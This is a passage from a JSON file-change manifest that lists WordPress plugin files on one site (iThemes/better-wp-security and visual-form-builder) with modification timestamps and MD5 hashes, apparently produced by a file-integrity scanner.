iz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/setup.php\":{\"d\":1545735242,\"h\":\"8fcfc4967c0c20dccf645a12fb07af5c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/active.php\":{\"d\":1545735242,\"h\":\"8ee72ab5d6f447ea73bcbed0b559766d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/settings.php\":{\"d\":1545735242,\"h\":\"356445a023a052f59f950c618bf191db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/class-itsec-core-admin.php\":{\"d\":1545735242,\"h\":\"d3bd2d87dedb30d8d4c58fd1f7b0c3e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/css\\/images\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/css\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/css\\/jquery.datepicker.css\":{\"d\":1545735242,\"h\":\"a995cff531fa79ab6d80037723a61c42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/css\\/jquery-ui.min.css\":{\"d\":1545735242,\"h\":\"fd1ff820fcf875772e26f0260a0b4d9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/sync-verbs\\/itsec-get-away-mode.php\":{\"d\":1545735242,\"h\":\"522a0d8b81e8a2419e1c83dc07f9b773\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/sync-verbs\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/sync-verbs\\/itsec-override-away-mode.php\":{\"d\":1545735242,\"h\":\"696cd11557267a5e7b9bb0ac5a34a53d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/js\\/admin-away-mode.js\":{\"d\":1545735242,\"h\":\"7ec5147185ec4df40a7fde2265607ec0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"12d2e11b43a2d741c822c7b5aa76ebda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/class-itsec-away-mode.php\":{\"d\":1545735242,\"h\":\"d1011ac709d2b3e9be27f6383235e909\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/utilities.php\":{\"d\":1545735242,\"h\":\"cb0ec3cea6eafb35800d1d01aef5ff1f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/settings-page.php\":{\"d\":1545735242,\"h\":\"befb43203f694757ed40b71ce0fd2762\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/validator.php\":{\"d\":1545735242,\"h\":\"b83dd7ebc62aeb4310226155f0031f41\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/activate.php\":{\"d\":1545735242,\"h\":\"bb1fce91e42098ba168a159433fcd907\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/setup.php\":{\"d\":1545735242,\"h\":\"bcefac71b1a9419bb511be4dfc6edce8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/logs.php\":{\"d\":1545735242,\"h\":\"f1f7260df287fb687399b647cb5fd4d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/active.php\":{\"d\":1545735242,\"h\":\"8b9ae6232add0a837d0a665f09483a05\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/settings.php\":{\"d\":1545735242,\"h\":\"2cd45719dca2e27b169df9c29bd1ecab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/away-mode\\/deactivate.php\":{\"d\":1545735242,\"h\":\"0ebdc54a6221d5f12d06e91c8e4bb956\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/img\\/mail\\/index.php\":{\"d\":1545735242,\"h\":\"03efe17b1c4a21753f7d07ee17e77395\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/img\\/index.php\":{\"d\":1545735242,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/tracking.js\":{\"d\":1545735242,\"h\":\"af44ef090dd429c67ab3c5b0ca0fa42b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-dashboard.js\":{\"d\":1545735242,\"h\":\"699b0e443a57f28d7a3e669d640d40ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-logs.js\":{\"d\":1545735242,\"h\":\"69ffc55192426976cbf0f4883c1ca4da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-modal.js\":{\"d\":1545735242,\"h\":\"b9c2a320342943bd484d3a4aeee105b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/itsec-notice.js\":{\"d\":1545735242,\"h\":\"4f566a5505d833da48dc12c6a4829f68\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-global-settings.js\":{\"d\":1545735242,\"h\":\"cd77355904d3c8c275c20a04a333c23e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/scrollTo.js\":{\"d\":1545735242,\"h\":\"6e19f467120770d4c405f2272388a7ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-dashboard-footer.js\":{\"d\":1545735242,\"h\":\"d1ea81a598b60670cd986f8e621ce017\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sidebar-widget-active-lockouts.php\":{\"d\":1545735239,\"h\":\"bb7175d125317a4fbfb0602c1eb58c61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sidebar-widget-temp-whitelist.php\":{\"d\":1545735239,\"h\":\"ab5807f5635e3b9c23cb57fffa2df07b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/notify.php\":{\"d\":1545735242,\"h\":\"f3b557193f7e42f23f3c786037f58299\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules.php\":{\"d\":1545735242,\"h\":\"326f129957c988d3bbbdb728de56bb91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib.php\":{\"d\":1545735242,\"h\":\"4be3dba7786bf635f877844eb7c1f725\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/show-multiple-version-notice.php\":{\"d\":1545735242,\"h\":\"614ae85a21ef48d51dee055c1cc2d726\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lockout.php\":{\"d\":1545735242,\"h\":\"86ef7f5be9a43b0586eba957d8748852\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/history.txt\":{\"d\":1545735242,\"h\":\"49c4a19b155cd1dd40d7b303360400a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/setup.php\":{\"d\":1545735242,\"h\":\"48c540801df7ca0f8488ef408d0aff47\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/core.php\":{\"d\":1545735242,\"h\":\"e62483a90b1332dab822a4cef4ef1c22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/files.php\":{\"d\":1545735242,\"h\":\"60f42e4d06f58cc955c7a71361b83cb2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/response.php\":{\"d\":1545735242,\"h\":\"b357055baa4759aec447d121004f2129\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/better-wp-security.php\":{\"d\":1545735239,\"h\":\"563018cd4dcc5ff360af74cd510e01ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/index.php\":{\"d\":1545735239,\"h\":\"56d4439768678cd301f9a9f140f9440b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/history.txt\":{\"d\":1545735239,\"h\":\"f52d6d00ad4dcca9bd27c6c940f7dcd6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/readme.txt\":{\"d\":1545735242,\"h\":\"8ba8e09a199e3cba9cf32e81c7f8dc1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/lang\\/visual-form-builder.pot\":{\"d\":1544494885,\"h\":\"eabf65cf4fb763f68bdd85a3993f64e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/css\\/visual-form-builder-admin.min.css\":{\"d\":1544494885,\"h\":\"156fbef15e802cd886cf91400381247f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/css\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/css\\/visual-form-builder-admin.css\":{\"d\":1544494885,\"h\":\"0a883adcb5dcc6b5ced9f9bc11c16940\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/img\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/js\\/vfb-validation.js\":{\"d\":1544494885,\"h\":\"34c5bf6f83f91cb410bec76f0c0ea0f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/js\\/vfb-admin.min.js\":{\"d\":1544494885,\"h\":\"5c3ed5981672900ae9b8e1c4eca4e46c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/js\\/vfb-admin.js\":{\"d\":1544494885,\"h\":\"98e9a75d5298470096190ce276d68139\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/js\\/jquery.ui.nestedSortable.js\":{\"d\":1544494885,\"h\":\"946d83fa633503271865d8308d82eaf5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/js\\/jquery.validate.min.js\":{\"d\":1544494885,\"h\":\"c593e70ef041ab387fefad5fe38a724c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/js\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/js\\/jquery.ui.nestedSortable.min.js\":{\"d\":1544494885,\"h\":\"dcb8840bc82c96568182ab1ca78af4e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/js\\/vfb-validation.min.js\":{\"d\":1544494885,\"h\":\"a22408d9848e41ad7feaf7bfcd060233\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/assets\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-save.php\":{\"d\":1544494885,\"h\":\"38a1fe6d457b97c0e64c7b06d5d5f586\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-load-css-js.php\":{\"d\":1544494885,\"h\":\"6b6e306b88b6d3a0851cdccf76612c2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-forms-new.php\":{\"d\":1544494885,\"h\":\"82a91d03261dad58a34a47e11d852a09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-page-settings.php\":{\"d\":1544494885,\"h\":\"325e1b675148062a1017189bceccb54c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-forms-metaboxes.php\":{\"d\":1544494885,\"h\":\"5dc9d3c6be78d7f3c84086af2dbbeff3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-screen-options.php\":{\"d\":1544494885,\"h\":\"58c36a7ca73a473e0a48dd83f62c9e9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-fields.php\":{\"d\":1544494885,\"h\":\"2c956712149bf998be8c16ddb6c44a40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-export.php\":{\"d\":1544494885,\"h\":\"1c80e2dcf729428608feacca1a209a49\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-admin-menu.php\":{\"d\":1544494885,\"h\":\"1de171c525a52568e5cd20a8d6dad877\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-widget.php\":{\"d\":1544494885,\"h\":\"40424dc31c12e332e3f64e99da48168c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-media-button.php\":{\"d\":1544494885,\"h\":\"1f12c3f10585acae330d1bb09cafb877\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-admin-notices.php\":{\"d\":1544494885,\"h\":\"9591bb1b71044b5e8541c23e56a18eaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-entries-list.php\":{\"d\":1544494885,\"h\":\"81bf56baba7ca0ea1e35baf1f8cee44c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-forms-edit.php\":{\"d\":1544494885,\"h\":\"69f096ccea849dd458b84a865f5b3180\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-entries-detail.php\":{\"d\":1544494885,\"h\":\"02bcebf853a66438239c881a5618a751\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-ajax.php\":{\"d\":1544494885,\"h\":\"da079b5fcc64aab24d11ee514490d69c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-forms-list.php\":{\"d\":1544494885,\"h\":\"0cffd972efc64e8f061f9c148bb6bff7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/admin\\/class-dashboard-widgets.php\":{\"d\":1544494885,\"h\":\"b4f18e510794c3cf001131bc08e8ca3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/css\\/smoothness\\/images\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/css\\/smoothness\\/jquery-ui-1.10.3.min.css\":{\"d\":1544494885,\"h\":\"b46c5a62ac93a491d54d2eda7111611e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/css\\/smoothness\\/jquery-ui-1.10.3.css\":{\"d\":1544494885,\"h\":\"5d30b3eb61c22cc283fe43109c536587\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/css\\/smoothness\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/css\\/visual-form-builder.min.css\":{\"d\":1544494885,\"h\":\"a7087f20d475709f92067b6007b3f796\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/css\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/css\\/visual-form-builder.css\":{\"d\":1544494885,\"h\":\"4934dfe4d80416b178a3dcc810a7d1ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/lang\\/en.js\":{\"d\":1544494885,\"h\":\"13e68db2445153b70e294643959e6cd5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/plugins\\/dialog\\/dialogDefinition.js\":{\"d\":1544494885,\"h\":\"73b1474cf9e14ab439d8b90183c6849b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/plugins\\/link\\/dialogs\\/link.js\":{\"d\":1544494885,\"h\":\"f94502fd01e2d24b3f00b2d50ac15aa4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/plugins\\/link\\/dialogs\\/anchor.js\":{\"d\":1544494885,\"h\":\"ac94ef450e45432296059f21f7e2cacc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/dialog_ie7.css\":{\"d\":1544494885,\"h\":\"d3036e6c6eec00d81096d7f653380ed8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/editor_iequirks.css\":{\"d\":1544494885,\"h\":\"05187618ee7ac67630db33e5335d7b2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/editor_gecko.css\":{\"d\":1544494885,\"h\":\"1643ab359598be48e257d1dc8df6564e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/dialog_iequirks.css\":{\"d\":1544494885,\"h\":\"b0acb95e134fba8de6f3451e1401ea9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/editor_ie7.css\":{\"d\":1544494885,\"h\":\"c065f7b98dfce0a40cc2e9f01b3eba49\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/editor_ie.css\":{\"d\":1544494885,\"h\":\"3eca9644101a3ce6d28bc40b7a4bf77f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/dialog.css\":{\"d\":1544494885,\"h\":\"16f82e3221956b72bdb7d569883ef789\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/dialog_opera.css\":{\"d\":1544494885,\"h\":\"61c2a2b27050f4564fb38d2af8975004\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/dialog_ie.css\":{\"d\":1544494885,\"h\":\"4e61cf344391e683be30f28b08eb075f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/editor.css\":{\"d\":1544494885,\"h\":\"86998996d5bded72252c699ef65cf929\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/editor_ie8.css\":{\"d\":1544494885,\"h\":\"ca8514075be92412bd1fbee41e5c9a88\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/readme.md\":{\"d\":1544494885,\"h\":\"a2e00abd50e5d5f7edb67d7de9f3216c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/skins\\/moono\\/dialog_ie8.css\":{\"d\":1544494885,\"h\":\"f07d4442a2ca3e068f8962952fe41519\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/config.js\":{\"d\":1544494885,\"h\":\"664bd97927a539d1d3a291228f3d0184\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/contents.css\":{\"d\":1544494885,\"h\":\"2fc0f6f42cc1cba1da1161dd1f2aa86f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/ckeditor\\/ckeditor.js\":{\"d\":1544494885,\"h\":\"a71523871d466d6acd12eac59885fef8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-es_ES.js\":{\"d\":1544494885,\"h\":\"33eb668803ca50555f4ced5b0348c527\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-de_DE.js\":{\"d\":1544494885,\"h\":\"fe69f260e1e46f8204694a4f8420e3fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-ja_JP.js\":{\"d\":1544494885,\"h\":\"5800618d2b6f4bc3d0947fbc27e45735\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-pt_BR.js\":{\"d\":1544494885,\"h\":\"73541a9fc8abe432462392a60c480cbd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-sv_SE.js\":{\"d\":1544494885,\"h\":\"f4d47dcaa9730efb7f05791955c68fb0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-ro_RO.js\":{\"d\":1544494885,\"h\":\"e82dedd77776c57ec5376c9cdca67861\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-he_IL.js\":{\"d\":1544494885,\"h\":\"afd2c641d8f5a1b848876aad88a319a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/m